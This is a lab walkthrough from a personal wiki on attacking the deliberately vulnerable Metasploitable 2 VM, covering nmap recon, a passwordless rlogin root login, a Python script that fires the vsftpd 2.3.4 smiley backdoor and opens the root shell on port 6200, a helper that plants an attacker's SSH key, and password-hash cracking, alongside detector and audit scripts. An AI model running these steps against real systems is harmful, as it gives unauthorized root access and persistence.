Metasploitable
From charlesreid1
Metasploitable is an intentionally vulnerable Linux virtual machine (Metasploitable 2, run here under VirtualBox) for pentesting practice. Everything below was done from a Kali box on the same 10.0.0.0/24 lab network.
Services
For reference, a list of services running on the metasploitable machine (the services table from the Metasploit database, populated from the nmap scan below):

Services
========

host       port  proto  name         state  info
----       ----  -----  ----         -----  ----
10.0.0.27  21    tcp    ftp          open   vsftpd 2.3.4
10.0.0.27  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
10.0.0.27  23    tcp    telnet       open   Linux telnetd
10.0.0.27  25    tcp    smtp         open   Postfix smtpd
10.0.0.27  53    tcp    domain       open   ISC BIND 9.4.2
10.0.0.27  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
10.0.0.27  111   tcp    rpcbind      open   2 RPC #100000
10.0.0.27  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
10.0.0.27  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
10.0.0.27  512   tcp    exec         open   netkit-rsh rexecd
10.0.0.27  513   tcp    login        open
10.0.0.27  514   tcp    tcpwrapped   open
10.0.0.27  1099  tcp    java-rmi     open   Java RMI Registry
10.0.0.27  1524  tcp    shell        open   Metasploitable root shell
10.0.0.27  2049  tcp    nfs          open   2-4 RPC #100003
10.0.0.27  2121  tcp    ftp          open   ProFTPD 1.3.1
10.0.0.27  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
10.0.0.27  3632  tcp                 open
10.0.0.27  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
10.0.0.27  5900  tcp    vnc          open   VNC protocol 3.3
10.0.0.27  6000  tcp    x11          open   access denied
10.0.0.27  6667  tcp    irc          open   Unreal ircd
10.0.0.27  6697  tcp                 open
10.0.0.27  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
10.0.0.27  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1
10.0.0.27  8787  tcp                 open

The three ports with no service name (3632, 6697, 8787) are outside nmap's default top-1000 list, so the -A scan below does not show them; 3632 is distcc, covered at Metasploitable/distcc.
Recon
Make a box for stuff (scan output and anything looted from this target goes here):
$ mkdir -p box/metasploitable
Start by using nmap to scan the host.
First a fast scan, -F, which checks only nmap's 100 most common ports, across the whole subnet:
$ nmap -F 10.0.0.*
Then we can do a more extensive scan. A SYN scan (-sS) needs raw sockets, so run it as root:
$ nmap -sS 10.0.0.*
Either sweep reveals the IP address of the VirtualBox VM, which is 10.0.0.27.
With the target known, do a deeper scan of that one host, adding version detection (-sV) and OS detection, default NSE scripts and traceroute (-A):
$ nmap -sS -sV -A 10.0.0.27
This will reveal an array of services, some of which may be exploitable using metasploit. It is also loud: -sV and -A connect to every open port and run banner probes and scripts, which is fine on a lab box but is exactly what an IDS notices.
Sure enough, the verbose scan returns lots of good information:
$ nmap -sS -sV -A 10.0.0.27

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-22 18:30 PDT
Nmap scan report for 10.0.0.27
Host is up (0.016s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2016-03-23T01:31:31+00:00; +33s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program  version   port/proto  service
|   100000   2         111/tcp     rpcbind
|   100000   2         111/udp     rpcbind
|   100003   2,3,4     2049/tcp    nfs
|   100003   2,3,4     2049/udp    nfs
|   100005   1,2,3     42810/tcp   mountd
|   100005   1,2,3     45599/udp   mountd
|   100021   1,3,4     34385/tcp   nlockmgr
|   100021   1,3,4     60702/udp   nlockmgr
|   100024   1         38085/udp   status
|_  100024   1         52004/tcp   status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    Java RMI Registry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info:
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression
|   Status: Autocommit
|_  Salt: w$K,8vk7k8tagd@PR*zK
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info:
|   Protocol version: 3.3
|   Security types:
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info:
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN
|   uptime: 0 days, 1:05:20
|   source ident: nmap
|   source host: 6D4CD63B.D3975B40.7B559A54.IP
|_  error: Closing Link: cxfhgnbdt[10.0.0.25] (Quit: cxfhgnbdt)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP
|_  System time: 2016-03-22T21:31:31-04:00

TRACEROUTE
HOP RTT      ADDRESS
1   16.11 ms 10.0.0.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds
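A scan is only useful once it is saved into the box directory and can be turned back into a services table like the one at the top of this page. The following is an added example, not code from the original page: it parses nmap's greppable output, which you get by adding -oG box/metasploitable/full.gnmap to the scan above, and prints the host/port/proto/name/state/info table, plus a short list of the clear-text and host-trust services worth looking at first. The gnmap text inside it is a constructed sample in nmap's -oG layout, not captured output, and the parser assumes nmap's convention of writing | for any / inside a version string.

```python
"""Turn nmap greppable output (-oG) into a host/port/proto/name/state/info table.

Added example, not part of the original page. Assumes the scan was saved with
    nmap -sS -sV -oG box/metasploitable/full.gnmap 10.0.0.27
and that nmap's -oG conventions hold: each port entry is
port/state/proto/owner/service/rpcinfo/version/ and a '/' inside a version
string is written as '|'.
"""
import re
import sys
from dataclasses import dataclass

# Constructed sample in -oG format (not real captured output).
SAMPLE_GNMAP = (
    "# Nmap 7.01 scan initiated Tue Mar 22 18:30:00 2016 as: "
    "nmap -sS -sV -oG full.gnmap 10.0.0.27\n"
    "Host: 10.0.0.27 ()\tStatus: Up\n"
    "Host: 10.0.0.27 ()\tPorts: "
    "21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.2.8 ((Ubuntu) DAV|2)/, "
    "513/open/tcp//login///, "
    "514/open/tcp//tcpwrapped///, "
    "1524/open/tcp//shell//Metasploitable root shell/, "
    "6200/closed/tcp//lm-x///"
    "\tIgnored State: closed (994)\n"
    "# Nmap done at Tue Mar 22 18:30:27 2016 -- 1 IP address (1 host up) "
    "scanned in 27.31 seconds\n"
)


@dataclass(frozen=True)
class Service:
    host: str
    port: int
    proto: str
    name: str
    state: str
    info: str


# Only lines that carry a "Ports:" field matter; the ports field ends at the
# next tab (before "Ignored State:").
_PORTS_LINE = re.compile(r"^Host:\s+(\S+)\s+\([^)]*\)\s+Ports:\s+([^\t]*)")

# Services that send credentials in the clear or authenticate by hostname;
# these are the ones to look at before reaching for Metasploit.
LEGACY = {"ftp", "telnet", "exec", "login", "shell", "rlogin", "rsh"}


def parse_gnmap(text: str) -> list:
    """Return one Service per port entry found in the -oG text."""
    services = []
    for line in text.splitlines():
        m = _PORTS_LINE.match(line)
        if not m:
            continue                      # comment or Status-only line
        host, ports = m.group(1), m.group(2)
        for entry in ports.split(", "):
            fields = entry.split("/")
            if len(fields) < 7:
                continue                  # malformed entry: skip, don't guess
            port, state, proto, _owner, name, rpc, version = fields[:7]
            version = version.replace("|", "/")   # undo nmap's escaping
            info = " ".join(p for p in (rpc, version) if p)
            services.append(Service(host, int(port), proto, name, state, info))
    return services


def open_services(services: list) -> list:
    return [s for s in services if s.state == "open"]


def legacy_services(services: list) -> list:
    """Open services whose protocol is clear-text or host-trust based."""
    return [s for s in open_services(services) if s.name in LEGACY]


def render_table(services: list) -> str:
    """Plain-text table in the same column order as the one on this page."""
    header = ("host", "port", "proto", "name", "state", "info")
    rows = [(s.host, str(s.port), s.proto, s.name, s.state, s.info) for s in services]
    widths = [max(len(r[i]) for r in rows + [header]) for i in range(6)]
    fmt = "  ".join("{:<%d}" % w for w in widths)
    lines = [fmt.format(*header), fmt.format(*("-" * len(h) for h in header))]
    lines += [fmt.format(*r) for r in rows]
    return "\n".join(line.rstrip() for line in lines)


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GNMAP
    found = parse_gnmap(text)
    print(render_table(open_services(found)))
    print("\nlegacy / clear-text:", ", ".join(str(s.port) for s in legacy_services(found)))
```

Run it as `python3 gnmap_table.py box/metasploitable/full.gnmap`; with no argument it prints the table for the constructed sample. Splitting on ", " is safe because nmap never puts a comma-space inside a single port entry, and the | -> / restoration is what makes "DAV/2" come back out intact.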
MySQL
See MSF/MySQL for the MySQL exploits using Metasploit framework.
PostgreSQL
One of the services running on metasploitable is PostgreSQL (a.k.a. postgres), so let's continue with the sql theme:
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
Rlogin
This one is trivial: ports 512, 513 and 514 are open for the Berkeley "r" services (rexec, rlogin, rsh). rlogind does not ask for a password when the target account's trust files (/etc/hosts.equiv and ~/.rhosts) list the connecting host and user, and on Metasploitable root's trust list has been left open to any host and any user.
All you need to do is ask nicely for root!
First, make sure rsh-client is installed. On Kali (and Debian generally) the rlogin command is an alternatives symlink that, without rsh-client, points at ssh, so you would be talking SSH to port 22 and get a password prompt instead of reaching the r-service on 513:
# apt-get install rsh-client
Now ask nicely for root:
# rlogin -l root 10.0.0.27
Last login: Tue Mar 22 20:26:16 EDT 2016 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#
This machine is now totally compromised!
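The same misconfiguration is easy to find from the other side. The following is an added example, not from the original page: a POSIX shell audit of the files rlogind and rshd consult (/etc/hosts.equiv, /root/.rhosts and every /home/*/.rhosts) that flags the bare `+` wildcard entries which mean "any host" or "any user", plus a helper that strips them. Point it at a mounted copy of the target filesystem (an NFS mount, for instance) by passing the mount point; the directory layout and file contents in the usage below are constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the original page. Audits the host-trust files that
# rlogind/rshd read and reports the wildcard entries that make
# `rlogin -l root` work without a password.

# Usage: audit_rhosts [ROOT]
# ROOT is the root of the filesystem to inspect (default: the live system;
# pass an NFS mount point to audit a remote box). Prints "FILE: ENTRY" for
# every wildcard entry and a warning for writable trust files; exits 0 only
# when nothing was found.
audit_rhosts() {
    root="${1:-}"
    bad=0
    for f in "$root/etc/hosts.equiv" "$root/root/.rhosts" "$root"/home/*/.rhosts; do
        [ -f "$f" ] || continue
        # Each entry is "host [user]". A bare '+' in either field is a
        # wildcard; "+ +" trusts every user on every host, which is the
        # misconfiguration behind the passwordless root login above.
        hits=$(awk '!/^[[:space:]]*#/ && ($1 == "+" || $2 == "+") { print FILENAME ": " $0 }' "$f")
        if [ -n "$hits" ]; then
            printf '%s\n' "$hits"
            bad=$((bad + 1))
        fi
        # A trust file other users can write lets any local account grant
        # itself (or anyone) trust, so report that as well.
        if [ -n "$(find "$f" -maxdepth 0 -perm -002)" ]; then
            printf 'WORLD-WRITABLE %s\n' "$f"
            bad=$((bad + 1))
        fi
    done
    [ "$bad" -eq 0 ]
}

# Usage: strip_rhosts_wildcards FILE
# Removes the wildcard entries from one trust file in place, keeping
# comments and explicit host/user entries.
strip_rhosts_wildcards() {
    f="$1"
    tmp="$f.$$"
    awk '/^[[:space:]]*#/ || !($1 == "+" || $2 == "+")' "$f" > "$tmp" && mv "$tmp" "$f"
}

# Usage example against a constructed tree (not a real target):
#   mkdir -p /tmp/t/root && printf '+ +\n' > /tmp/t/root/.rhosts
#   audit_rhosts /tmp/t || echo "wildcard trust found"
#   strip_rhosts_wildcards /tmp/t/root/.rhosts && audit_rhosts /tmp/t && echo clean
```

Stripping the wildcard is the minimum fix; the real one is to disable rexec, rlogin and rsh in inetd and use SSH, since even an explicit host entry is trust by source IP, which anyone on the segment can spoof.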
VSFTP
The particular version of vsftpd running on Metasploitable, 2.3.4, is the release whose source tarball had a backdoor slipped into it. If the username sent in the FTP USER command contains a smiley :) anywhere in it, the server binds a shell to TCP port 6200 and hands it to whoever connects next; the login itself never has to succeed, and the shell runs as root.
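What follows is an added example, not code from the original page, from vsftpd or from Metasploit: the trigger condition as the backdoored source checked it (the byte pair 0x3a 0x29, i.e. ":)", anywhere in the USER argument), the two-command FTP exchange that fires it followed by a connect to 6200, and a small detector that runs the same check over FTP log lines so the blue team can spot the attempt. The log lines in the block are constructed samples in vsftpd's "[pid N] [user] ..." layout, not real captures; the network function is only exercised when you run the script against a host.

```python
"""vsftpd 2.3.4 backdoor: trigger condition, the exchange that fires it, and a
log detector.

Added example; not code from the original page, vsftpd or Metasploit.
The backdoored str.c looked for the bytes 0x3a 0x29 (":)") anywhere in the
USER argument and then bound /bin/sh to TCP/6200.
"""
import re
import socket
import sys
from typing import Optional

TRIGGER = b"\x3a\x29"          # ":)"
FTP_PORT = 21
BACKDOOR_PORT = 6200


def contains_trigger(username: bytes) -> bool:
    """Mirror of the backdoor's check: the smiley may sit anywhere in USER."""
    return TRIGGER in username


def trigger_commands(username: str = "probe:)", password: str = "x") -> list:
    """The FTP commands that arm the backdoor; the password is irrelevant."""
    return [f"USER {username}\r\n".encode(), f"PASS {password}\r\n".encode()]


def trigger_backdoor(host: str, timeout: float = 5.0) -> Optional[socket.socket]:
    """Send the trigger to the FTP service, then try the 6200 listener.

    Returns a socket connected to the shell, or None if nothing is listening
    on 6200 afterwards (server not backdoored, or the port is filtered).
    """
    with socket.create_connection((host, FTP_PORT), timeout=timeout) as ftp:
        ftp.recv(1024)                      # 220 banner
        for cmd in trigger_commands():
            ftp.sendall(cmd)
            try:
                ftp.recv(1024)              # a backdoored server may not answer
            except socket.timeout:
                pass
    try:
        return socket.create_connection((host, BACKDOOR_PORT), timeout=timeout)
    except OSError:
        return None


# Constructed sample vsftpd log lines (not real captures).
SAMPLE_LOG = """\
Tue Mar 22 20:10:01 2016 [pid 3202] CONNECT: Client "10.0.0.25"
Tue Mar 22 20:10:02 2016 [pid 3201] [msfadmin] OK LOGIN: Client "10.0.0.25"
Tue Mar 22 20:11:40 2016 [pid 3210] CONNECT: Client "10.0.0.25"
Tue Mar 22 20:11:41 2016 [pid 3209] [8Rs0qz:)] FTP response: Client "10.0.0.25", "331 Please specify the password."
Tue Mar 22 20:12:05 2016 [pid 3221] [anonymous] OK LOGIN: Client "10.0.0.30", anon password "x"
"""

_LOG_USER = re.compile(r'\[pid \d+\] \[(?P<user>[^\]]*)\] .*Client "(?P<client>[^"]+)"')


def find_triggers(log_text: str) -> list:
    """(client, username) for each logged session whose USER carried the trigger."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_USER.search(line)
        if m and contains_trigger(m.group("user").encode()):
            hits.append((m.group("client"), m.group("user")))
    return hits


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("usage: vsftpd_smiley.py HOST   (detector demo:", find_triggers(SAMPLE_LOG), ")")
        sys.exit(0)
    shell = trigger_backdoor(sys.argv[1])
    if shell is None:
        print("port 6200 did not open: not backdoored, or already filtered")
    else:
        shell.sendall(b"id\n")              # expect uid=0(root) on Metasploitable
        print(shell.recv(1024).decode(errors="replace"))
        shell.close()
```

On the defensive side the two signals are the one the detector looks for (a USER value containing ":)") and a new listener on 6200 appearing right after an FTP connection; either alone is enough to page on.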
SSH
There are several ways to get into a machine using SSH.
SSH Brute Force
(The caveman approach)
The first is to guess the password online with a tool like hydra. This is extremely slow, and it needs a list of account names on the remote machine. /etc/passwd is world-readable and gives you exactly that list (every account, and which ones have a real login shell), so with a copy of it you can brute-force passwords for some or all users. Note that /etc/passwd no longer holds password hashes; those live in /etc/shadow, which only root can read. If you can get a copy of both (as root via the rlogin trick above, or by mounting the NFS export), feed them to John the Ripper instead: cracking offline is much, much, much faster than hydra.
Metasploitable/SSH/Brute Force
SSH Keys
If you have WRITE access to the target's filesystem, through an exploit such as the rlogin trick above, through a PHP shell dropped via a web app vulnerability, or through a netcat payload, you can generate an SSH key pair on the attacker machine and append its public half to the target account's ~/.ssh/authorized_keys. From then on you can log in as that account without a password (the key, not a "trusted host" entry, is what sshd checks). The method needs write access to the right home directory, so it is a persistence step that follows some other foothold, for instance the NFS export or a remote shell.
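The step that usually goes wrong here is not the key but the file modes: sshd's default StrictModes refuses authorized_keys when the home directory, ~/.ssh or the file itself is writable by group or others, and you simply get the password prompt back. The following is an added example, not from the original page: a POSIX shell helper that installs a public key line idempotently with the modes sshd wants, and a check that tells you in advance whether StrictModes will accept it. The home path and the key line in the usage are placeholders; against a target mounted over NFS you would pass the mounted home (e.g. the mount point plus /root).

```sh
#!/bin/sh
# Added example, not from the original page. Plants the attacker's public key
# in a target account's authorized_keys with the permissions sshd insists on.

# Usage: make_attacker_key DIR -> writes DIR/id_rsa and DIR/id_rsa.pub
# RSA rather than ed25519 because Metasploitable's OpenSSH 4.7p1 (2007)
# does not know ed25519 keys at all.
make_attacker_key() {
    ssh-keygen -q -t rsa -b 2048 -N '' -f "$1/id_rsa"
}

# Usage: install_authorized_key HOME PUBKEY_LINE [OWNER]
# HOME is the target account's home as you see it (for an NFS mount, the
# mount point plus the home path). Idempotent: re-running does not
# duplicate the key. OWNER, if given, is chown'ed onto ~/.ssh, since sshd
# also requires the files to belong to the account (or root).
install_authorized_key() {
    home="$1"; key="$2"; owner="${3:-}"
    dir="$home/.ssh"; ak="$dir/authorized_keys"
    mkdir -p "$dir" && chmod 700 "$dir"
    [ -f "$ak" ] || : > "$ak"
    grep -qxF "$key" "$ak" || printf '%s\n' "$key" >> "$ak"
    chmod 600 "$ak"
    [ -z "$owner" ] || chown -R "$owner" "$dir"
}

# Usage: strictmodes_ok HOME -> exit 0 if sshd (StrictModes yes) will read
# the key file, 1 if the home, ~/.ssh or authorized_keys is missing or is
# writable by group or others.
strictmodes_ok() {
    home="$1"
    for p in "$home" "$home/.ssh" "$home/.ssh/authorized_keys"; do
        [ -e "$p" ] || return 1
        if [ -n "$(find "$p" -maxdepth 0 \( -perm -020 -o -perm -002 \))" ]; then
            return 1
        fi
    done
    return 0
}

# Usage example (placeholder paths; not a real target):
#   make_attacker_key box/metasploitable
#   install_authorized_key /mnt/nfs/root "$(cat box/metasploitable/id_rsa.pub)" root
#   strictmodes_ok /mnt/nfs/root && ssh -i box/metasploitable/id_rsa root@10.0.0.27
```

One more caveat for this particular target: a current OpenSSH client disables SHA-1 RSA signatures by default, which is all a 2007 server offers, so the login needs `-oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa` on the ssh command line or in ~/.ssh/config for 10.0.0.27.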
SSH Exploits
Old or unpatched SSH servers (Metasploitable runs the 2007-era OpenSSH 4.7p1), or weak cryptographic settings, can also be attacked directly.
More info at Metasploitable/SSH/Exploits
Shadow File
John the Ripper
You can use the /etc/passwd and /etc/shadow files to crack passwords on a Unix system. First "unshadow" them (John the Ripper ships an unshadow tool that merges the two into passwd-style lines with the hash in the password field), then let john guess at the passwords.
General notes about cracking /etc/shadow with John: John the Ripper/Shadow File
Metasploitable-specific notes: Metasploitable/John Shadow File
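The merge is simple enough to see in a few lines, and doing it yourself also lets you triage the accounts before spending CPU on them. The following is an added example, not code from the original page or from John the Ripper: it performs the same merge as unshadow and classifies each shadow entry (locked, no password, or which crypt(3) scheme) so that only the accounts with a real hash go to john with the right --format. The passwd and shadow contents inside it are constructed samples in the real file formats with dummy hashes of the right shape; they are not Metasploitable's actual files.

```python
"""Merge /etc/passwd and /etc/shadow into John-ready lines and triage the
accounts before cracking.

Added example; not from the original page or from John the Ripper (whose
`unshadow` tool does the merge step). The two files below are constructed
samples, not Metasploitable's; the hash strings are dummies with the right
shape ($1$ = md5crypt, the scheme Ubuntu 8.04 used).
"""

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
"""

SHADOW = """\
root:$1$SaltSalt$Ab1Cd2Ef3Gh4Ij5Kl6Mn7/:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
msfadmin:$1$aBcDeFgH$Zz9Yy8Xx7Ww6Vv5Uu4Tt3/:14684:0:99999:7:::
user:$1$HhGgFfEe$Qq1Ww2Ee3Rr4Tt5Yy6Uu7/:14699:0:99999:7:::
service:!$1$ZyXwVuTs$Mm9Nn8Bb7Vv6Cc5Xx4Zz3/:14715:0:99999:7:::
sshd:*:14684:0:99999:7:::
"""

# crypt(3) prefixes -> scheme. The names are the --format names john uses
# for the schemes it implements natively; yescrypt goes through --format=crypt.
_SCHEMES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}


def parse_passwd(text: str) -> dict:
    """user -> the seven passwd fields (name, pw, uid, gid, gecos, home, shell)."""
    out = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            f = line.split(":")
            if len(f) == 7:
                out[f[0]] = f
    return out


def parse_shadow(text: str) -> dict:
    """user -> password field (second column of shadow)."""
    out = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            f = line.split(":")
            if len(f) >= 2:
                out[f[0]] = f[1]
    return out


def hash_kind(h: str) -> str:
    """Classify a shadow password field.

    'empty' is an account with no password at all (worse than crackable),
    'locked' means a leading ! or * and nothing to crack.
    """
    if h == "":
        return "empty"
    if h.startswith(("!", "*")):
        return "locked"
    for prefix, kind in _SCHEMES.items():
        if h.startswith(prefix):
            return kind
    if len(h) == 13 and "$" not in h:
        return "descrypt"                 # traditional DES crypt
    return "unknown"


def unshadow(passwd_text: str, shadow_text: str) -> str:
    """Same merge as John's unshadow: passwd lines with the hash in field 2."""
    shadow = parse_shadow(shadow_text)
    lines = []
    for user, fields in parse_passwd(passwd_text).items():
        f = list(fields)
        f[1] = shadow.get(user, f[1])     # keep 'x' if shadow has no entry
        lines.append(":".join(f))
    return "\n".join(lines)


def crackable(passwd_text: str, shadow_text: str) -> list:
    """(user, scheme, shell) for every account that has a real hash."""
    shadow = parse_shadow(shadow_text)
    result = []
    for user, f in parse_passwd(passwd_text).items():
        kind = hash_kind(shadow.get(user, ""))
        if kind not in ("empty", "locked", "unknown"):
            result.append((user, kind, f[6]))
    return result


def no_password(passwd_text: str, shadow_text: str) -> list:
    """Accounts whose shadow field is empty: login needs no password at all."""
    shadow = parse_shadow(shadow_text)
    return [u for u in parse_passwd(passwd_text) if hash_kind(shadow.get(u, "")) == "empty"]


if __name__ == "__main__":
    print(unshadow(PASSWD, SHADOW))
    for user, kind, shell in crackable(PASSWD, SHADOW):
        print(f"{user}: {kind} ({shell})")
```

With real files the call is `unshadow(open('passwd').read(), open('shadow').read())` written to a file, then `john --format=md5crypt --wordlist=... unshadowed.txt` for a Metasploitable-era box; the triage matters because john will happily spend hours on the locked service accounts if you hand it the whole file.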
Network File System
(Also see Linux/File Server page for general notes on NFS in Linux.)
DNS Bind
The BIND DNS server (ISC BIND 9.4.2) listening on port 53 can be cache-poisoned using Metasploit. This takes some care in executing, even on a local lab network.
Apache
Attacking Apache with Metasploit: Metasploitable/Apache
Attacking Apache with Python: Metasploitable/Apache/Python
Tor's Hammer: Metasploitable/TorsHammer
WebDAV
Abusing WebDAV: Metasploitable/Apache/DAV
Flags
Metasploit: any and all resources related to metasploit on this wiki
  Category:Metasploit - pages labeled with the "Metasploit" category label
  MSF/Wordlists - wordlists that come bundled with Metasploit
  MSFVenom - msfvenom is used to craft payloads
  Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload

Metasploitable: The Red Team
Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.
  Exploiting MySQL with Metasploit: Metasploitable/MySQL
  Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres
  Exploiting VSFTP Backdoor: Metasploitable/VSFTP
  SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force
  SSH Penetration with Keys: Metasploitable/SSH/Keys
  SSH Penetration with Metasploit: Metasploitable/SSH/Exploits
  Exploiting NFS: Metasploitable/NFS
  Exploiting DNS Bind Server: Metasploitable/DNS Bind
  Metasploitable Services: distcc: Metasploitable/distcc
  Metasploitable Apache:
    Exploiting Apache (with Metasploit): Metasploitable/Apache
    Exploiting Apache (with Python): Metasploitable/Apache/Python
    Tor's Hammer DoS Attack: Metasploitable/TorsHammer
    Apache DAV: Metasploitable/Apache/DAV
    Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote
  Metasploitable Memory:
    General approach to memory-based attacks: Metasploitable/Memory
    Investigating memory data: Metasploitable/Volatile Data Investigation
    Dumping Memory from Metasploit: Metasploitable/Dumping Memory
  Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...)

Metasploitablue: The Blue Team
Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions. Hence the name, Metasploita-blue.
  Overview: Metasploitable/Defenses
    Metasploitable/Defenses/Stopping · Metasploitable/Defenses/Detecting
  Metasploitable On-Machine Defenses:
    Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation
    Linux Artifact Investigation: Metasploitable/Artifact Investigation
    Linux Iptables Essentials: Metasploitable/Iptables
    Firewall Assurance and Testing: Metasploitable/Firewall
    Password Assessment: Metasploitable/Password Assessment
    Standard Unix Ports: Unix/Ports
  Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat
  Nmap (Blue Team): Metasploitable/Nmap
  Network Traffic Analysis: Metasploitable/Network Traffic Analysis
  Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns
  Snort IDS: Metasploitable/Snort

Category:Security · Category:Metasploit · Category:Metasploitable · Category:Kali